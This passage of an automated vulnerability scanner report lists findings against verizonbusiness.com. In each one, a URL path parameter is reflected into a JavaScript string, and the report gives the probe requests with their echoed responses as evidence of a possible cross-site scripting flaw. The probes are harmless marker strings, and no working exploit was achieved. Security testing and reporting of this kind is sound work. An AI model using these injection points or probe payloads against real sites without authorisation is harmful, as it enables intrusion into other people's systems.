GET /aboutab8db'%3b0339a38bc2d/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:06 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutab8db';0339a38bc2d/news/pr-25634-en-Verizon Business Earns Telemark.s `World Class. Ranking Among Information Communications Technology Providers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=n
...[SNIP]...

1.389. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1020d'%3b9a005eb3c7c was submitted in the REST URL parameter 2. This input was echoed as 1020d';9a005eb3c7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news1020d'%3b9a005eb3c7c/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news1020d';9a005eb3c7c/pr-25634-en-Verizon Business Earns Telemark..s `World Class.. Ranking Among Information Communications Technology Providers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new
...[SNIP]...

1.390. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 222c3"%3b7ee8c72751 was submitted in the REST URL parameter 2. This input was echoed as 222c3";7ee8c72751 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news222c3"%3b7ee8c72751/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47317
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news222c3";7ee8c72751/pr-25634-en-Verizon Business Earns Telemark..s `World Class.. Ranking Among Information Communications Technology Providers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONT
...[SNIP]...

1.391. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a1"%3b677cb8b9cea was submitted in the REST URL parameter 3. This input was echoed as 911a1";677cb8b9cea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/911a1"%3b677cb8b9cea.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49879
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/911a1";677cb8b9cea..s `World Class.. Ranking Among Information Communications Technology Providers.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//A
...[SNIP]...

1.392. http://www.verizonbusiness.com/about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark¿s%20`World%20Class¿%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25634-en-Verizon%20Business%20Earns%20Telemark.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d93d7'%3b1d329fc1521 was submitted in the REST URL parameter 3. This input was echoed as d93d7';1d329fc1521 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/d93d7'%3b1d329fc1521.s%20`World%20Class.%20Ranking%20Among%20Information%20Communications%20Technology%20Providers.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49881
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/d93d7';1d329fc1521..s `World Class.. Ranking Among Information Communications Technology Providers.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.393. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74c8b"%3b399b28f7104 was submitted in the REST URL parameter 1. This input was echoed as 74c8b";399b28f7104 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about74c8b"%3b399b28f7104/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:50:48 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40754
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about74c8b";399b28f7104/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACT
...[SNIP]...

1.394. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34dea'%3bfacac72ba72 was submitted in the REST URL parameter 1. This input was echoed as 34dea';facac72ba72 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about34dea'%3bfacac72ba72/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:26 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40754
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about34dea';facac72ba72/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.395. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90d7c'%3bfb215641240 was submitted in the REST URL parameter 2. This input was echoed as 90d7c';fb215641240 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news90d7c'%3bfb215641240/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:56 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47215
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news90d7c';fb215641240/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.396. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef0ea"%3ba6f8d4b4575 was submitted in the REST URL parameter 2. This input was echoed as ef0ea";a6f8d4b4575 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsef0ea"%3ba6f8d4b4575/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47217
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsef0ea";a6f8d4b4575/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION S
...[SNIP]...

1.397. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8711e'%3be519a2b3f56 was submitted in the REST URL parameter 3. This input was echoed as 8711e';e519a2b3f56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/8711e'%3be519a2b3f56 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/8711e';e519a2b3f56'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.398. http://www.verizonbusiness.com/about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25635-en-Bob+Toohey+Named+President+of+Verizon's+Global+Business+Unit.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2577d"%3b07b53c791a6 was submitted in the REST URL parameter 3. This input was echoed as 2577d";07b53c791a6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/2577d"%3b07b53c791a6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/2577d";07b53c791a6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.399. http://www.verizonbusiness.com/about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87f00'%3b42a0cb38ecb was submitted in the REST URL parameter 1. This input was echoed as 87f00';42a0cb38ecb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about87f00'%3b42a0cb38ecb/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40766
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about87f00';42a0cb38ecb/news/pr-25636-en-Verizon+Business+Helps+Burberry+Deliver+Global+Fashion+Experience.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

